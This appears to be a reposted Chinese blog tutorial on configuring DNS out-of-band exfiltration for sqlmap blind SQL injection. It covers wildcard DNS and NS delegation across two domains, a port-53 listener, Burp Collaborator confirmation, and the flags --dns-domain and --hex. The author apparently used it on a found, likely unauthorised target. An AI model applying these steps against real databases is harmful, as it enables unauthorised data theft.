当前位置: 首页 > news >正文

网络安全之SQLMAP _DNS注入配置方法

网上针对sqlmap进行dns注入的相关文章太少,只是简单介绍了下–dns-domain参数,相关的实战文章要么就模糊或者一笔带过,。然后参考网上的方法重新整理了一遍,简单理解。

需要准备的东西,sqlmap、windows盲注一个、两个域名、一台外网服务器。
图片.png
某次搞事情的时候碰到一个时间盲注,碰巧是台windows的,想起dns注入的方法。
image
在开始前我准备先用sqlmap的–sql-shell 命令进行dns注入payload的测试
图片.png先到burpsuite中的collaborator client中复制出burp给我们安排的域名

在利用sqlmap执行sql语句
图片.pngSqlmap还在跑的过程中burpsuite中已经接收到请求了。

图片.png
352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.

中的352E362E3134就是执行version()后返回的结果。

图片.png

解码获取到mysql的版本。好了至此这个点进行dns注入是没毛病的。

准备配置域名2个,网上有些文章说一个也行,但是总感觉较为麻烦,很多域名服务器商也并未提供某些高级功能,所以还是准备两个的简单些。

www.a.com
www.b.com

首先我们来配置域名a-> a.com
图片.png

只需要添加*进行泛解析指向我们的外网服务器的ip就可以了。

在来配置我们的域名b->b.com
图片.png

这个就更简单了,直接修改域名的dns,就填入ns1.a.com ns2.a.com 就行了其他的都不用搞,照着填写就行了。

然后等待域名生效。我们在到外网服务器上来测试下看是否解析成功

图片.png

服务器上开始监听53端口
图片.png

然后本机ping hello.b.com 在外网服务器上发我们已经能接受到hello.b.com的请求,并且本机提示是找不到主机不用管,因为我们没有设置解析。已经都配置完毕我们使用sqlmap进行dns注入即可。
图片.png

Sqlmap中加入参数–dns-domain=b.com --hex即可

qe
来到这一步sqlmap会卡住提示设置DNS服务器实例

直接ctrl+c

image

提示通过DNS通道的数据检索成功。

注入的速度就跟报错和联合一样快了,再也不用忍受龟速了。


http://www.mrgr.cn/news/70382.html

相关文章:

  • 【架构】主流企业架构Zachman、ToGAF、FEA、DoDAF介绍
  • 【iOS】知乎日报总结
  • 在SQLyog中导入和导出数据库
  • Unity 设计模式-单例模式(Singleton)详解
  • 【Linux】进程的生命之旅——诞生、消逝与守候(fork/exit/wait)
  • 资源控制器--laravel进阶篇
  • MySQL初学之旅(2)增删改查—上
  • 基于微信生态的开源 AI 智能名片 2+1 链动模式 S2B2C 商城小程序源码拉新策略研究
  • linux内存管理学习笔记
  • 制造业怎么用好仓库管理系统?仓库管理系统在制造业中的应用实例
  • Python __del__()销毁对象
  • python爬虫豆瓣top250
  • 精华帖分享|历史波动率和已实现波动率纠缠研究
  • 3. JVM 发展历程
  • 【Linux进程篇1】认识冯·诺依曼体系结构(引出进程详解)
  • 皮卡超级壁纸 1.4.1 | 解锁会员版的全景壁纸、动态壁纸和超级壁纸
  • solo博客源码使用idea编译运行
  • ‘conda‘ 不是内部或外部命令,也不是可运行的程序或批处理文件,Miniconda
  • 日常bug记录,easyexcel导入报错convert data ... to class java.math.BigDecimal error
  • java调用shell
  • BGP线路的优势和使用场景有哪些?
  • 两个链表求并集、交集、差集
  • 第21节 arkts 如何读取普通文件
  • wsl2更换字体|解决nvim图标无法显示问题
  • 群晖WebDAV结合内网穿透轻松实现思源笔记跨网络同步
  • Forest-HTTP客户端框架学习笔记